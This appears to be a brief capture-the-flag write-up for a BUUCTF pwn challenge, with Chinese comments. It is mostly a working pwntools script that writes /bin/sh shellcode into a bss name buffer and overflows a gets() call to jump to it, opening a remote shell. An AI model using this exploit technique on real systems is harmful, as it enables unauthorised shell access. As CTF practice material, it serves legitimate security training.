Found that name is on the global variable bss segment
You can use gets() to overflow
from pwn import*
r=remote('node3.buuoj.cn',27785)
context(arch='amd64',os='linux') 说明版本架构
shellcode=asm(shellcraft.sh()) 获取生成调用 bin/sh的 shellcode
r.sendlineafter('tell me your name',shellcode) 往name里面写入shellcode
payload='a'*0x28+p64(0x601080)
r.sendlineafter('What do you want to say to me?',payload)
r.interactive()